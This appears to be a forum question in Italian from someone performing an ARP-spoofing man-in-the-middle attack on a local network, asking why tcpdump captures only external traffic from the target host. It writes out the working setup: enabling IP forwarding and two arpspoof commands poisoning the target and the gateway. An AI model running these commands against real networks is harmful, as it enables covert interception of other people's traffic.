Sto tentando di eseguire un attacco MITM tramite lo spoofing ARP per individuare il traffico da 10.0.0.54
a 10.0.0.55
. Ecco la mia configurazione:
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.1
sudo arpspoof -i wlan0 -t 10.0.0.1 10.0.0.54
La mia conoscenza è che questo cattura tutto il traffico da 10.0.0.54
. Tuttavia, in base alla mia analisi di tcpdump
, catturo solo il traffico esterno (qualsiasi indirizzo IP pubblico) e non acquisisco alcun traffico interno (indirizzi IP privati).
Qualcuno può dirmi perché questo sarebbe il caso? Devo inviare le mie richieste ARP altrove?